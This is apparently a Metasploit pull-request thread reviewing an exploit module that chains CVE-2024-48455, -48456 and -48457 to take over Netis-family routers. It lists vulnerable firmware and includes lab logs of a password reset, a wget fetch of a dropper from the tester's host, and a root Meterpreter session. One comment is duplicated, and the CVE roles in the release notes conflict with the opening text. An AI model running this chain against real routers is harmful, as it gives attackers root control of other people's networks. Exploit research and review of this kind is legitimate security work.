Netis Router Exploit Chain Reactor [CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457]

[h00die-gr3y]

Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection vulnerability at the change admin password page of the router web interface (see CVE-2024-48456 for more details).
The vulnerability stems from improper handling of the password and new password parameter within the router's web interface. Attackers can inject a command in the password or new password parameter, encoded in base64, to exploit the command injection vulnerability.
When exploited, this can lead to command execution, potentially allowing the attacker to take full control of the router.
An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
attacker to reset the Wifi and router password, hence gaining full root access to the router to execute the RCE.

Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running specific vulnerable firmware.

The following router firmware versions are vulnerable:

• netis_MW5360_V1.0.1.3031_fw.bin
• Netis_MW5360-1.0.1.3442.bin
• Netis_MW5360_RUSSIA_844.bin
• netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
• netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
• netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
• Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
• netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
• netis_NC65_V3.0.0.3749.bin
• Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
• Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
• netis_NX10_V2.0.1.3582_fw.bin
• netis_NX10_V2.0.1.3643.bin
• Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
• netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
• netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
• netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
• Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
• GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)

and potentially others...

[jheysel-r7]

Hey @h00die-gr3y, thanks for the module! For the most part it looks good. I was having some issues getting a shell back from my emulated target. I don't think it's an issue with the module, it seems it's a networking issue, my emulated router can't connect back to my host:

~ # wget http://192.168.1.253:9090
Connecting to 192.168.1.253:9090 (192.168.1.253:9090)
wget: can't connect to remote host (192.168.1.253): No route to host

I tried manually adding routes/ verifying ip tables weren't the issue among other troubleshooting initiatives. I was running the emulation on a fresh Ubuntu 22.04 and was wondering what you were testing on? Or if you experienced any similar issues?

I was able to connect to the router's http server from my host, the check method worked as expected, this is what my testing output looked like:

msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > run 
[*] Started reverse TCP handler on 192.168.1.253:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.254:80 can be exploited.
[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
[*] Resetting router password for authentication.
[*] Logging in with the new router password rwmF2eT7AxZu to get the password cookie.
[*] Saving router credentials (root) at the msf database.
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.1.253:8080/CdbqYN
[*] Executing wget -qO /var/tmp/zwrNtOHP http://192.168.1.253:8080/CdbqYN
[*] Command Stager progress -  47.20% done (59/125 bytes)
[*] Executing chmod +x /var/tmp/zwrNtOHP
[*] Command Stager progress -  68.00% done (85/125 bytes)
[*] Executing /var/tmp/zwrNtOHP
[*] Command Stager progress -  81.60% done (102/125 bytes)
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.

[h00die-gr3y]

Hey @h00die-gr3y, thanks for the module! For the most part it looks good. I was having some issues getting a shell back from my emulated target. I don't think it's an issue with the module, it seems it's a networking issue, my emulated router can't connect back to my host:

~ # wget http://192.168.1.253:9090
Connecting to 192.168.1.253:9090 (192.168.1.253:9090)
wget: can't connect to remote host (192.168.1.253): No route to host

I tried manually adding routes/ verifying ip tables weren't the issue among other troubleshooting initiatives. I was running the emulation on a fresh Ubuntu 22.04 and was wondering what you were testing on? Or if you experienced any similar issues?

I was able to connect to the router's http server from my host, the check method worked as expected, this is what my testing output looked like:

msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > run 
[*] Started reverse TCP handler on 192.168.1.253:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.254:80 can be exploited.
[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
[*] Resetting router password for authentication.
[*] Logging in with the new router password rwmF2eT7AxZu to get the password cookie.
[*] Saving router credentials (root) at the msf database.
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.1.253:8080/CdbqYN
[*] Executing wget -qO /var/tmp/zwrNtOHP http://192.168.1.253:8080/CdbqYN
[*] Command Stager progress -  47.20% done (59/125 bytes)
[*] Executing chmod +x /var/tmp/zwrNtOHP
[*] Command Stager progress -  68.00% done (85/125 bytes)
[*] Executing /var/tmp/zwrNtOHP
[*] Command Stager progress -  81.60% done (102/125 bytes)
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.

@jheysel-r7 ,
Try to play with the CMD_DELAY option There is a locking mechanism that kicks in if you send too many http requests in a certain time-frame. Sometimes 30 seconds is not sufficient. You can also check with Burpsuite capturing the requests to see if locking is the problem here.

[jheysel-r7]

Hey @h00die-gr3y. Thanks for the suggestion. I had setup FirmAE on Ubuntu 22 despite their install instructions stating:

Note that we tested FirmAE on Ubuntu 18.04.

Outbound tcp connections from the emulated router seemed to be blocked for whatever reason. I re-setup on Ubuntu 18 and had no issue.

Testing

msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > set rhost 192.168.1.254
rhost => 192.168.1.254
msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > set lhost 192.168.1.253
lhost => 192.168.1.253
msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > run
[*] Started reverse TCP handler on 192.168.1.253:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.254:80 can be exploited.
[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
[*] Resetting router password for authentication.
[*] Logging in with the new router password 3HZtVWwBVDX to get the password cookie.
[*] Saving router credentials (root) at the msf database.
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.1.253:8080/7PQoZIC
[*] Executing wget -qO /tmp/NcQZzmSJ http://192.168.1.253:8080/7PQoZIC
[*] Client 192.168.1.254 (Wget) requested /7PQoZIC
[*] Sending payload to 192.168.1.254 (Wget)
[*] Command Stager progress -  50.91% done (56/110 bytes)
[*] Executing chmod +x /tmp/NcQZzmSJ
[*] Command Stager progress -  70.91% done (78/110 bytes)
[*] Executing /tmp/NcQZzmSJ
[+] Deleted /tmp/NcQZzmSJ
[*] Meterpreter session 1 opened (192.168.1.253:4444 -> 192.168.1.254:35551) at 2025-01-07 16:39:36 -0800
[*] Command Stager progress -  82.73% done (91/110 bytes)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.254
OS           :  (Linux 4.1.17+)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter >

[jheysel-r7]

Release Notes

This adds an exploit module for Netis Routers including rebranded routers from GLCtec and Stone. The module chains 3 CVEs together to accomplish unauthenticated RCE. The first, CVE-2024-48456, is a command injection vulnerability in the change admin password page which allows an attacker to change the admin password to one of their choosing. The next vulnerability, CVE-2024-48457, is an authenticated RCE which can be chained with the first vuln nicely. The last CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running specific vulnerable firmware.

[jheysel-r7]

@h00die-gr3y PS. awesome job on finding these vulns 🎉 Loved reading through the research notes: h00die-gr3y/h00die-gr3y#2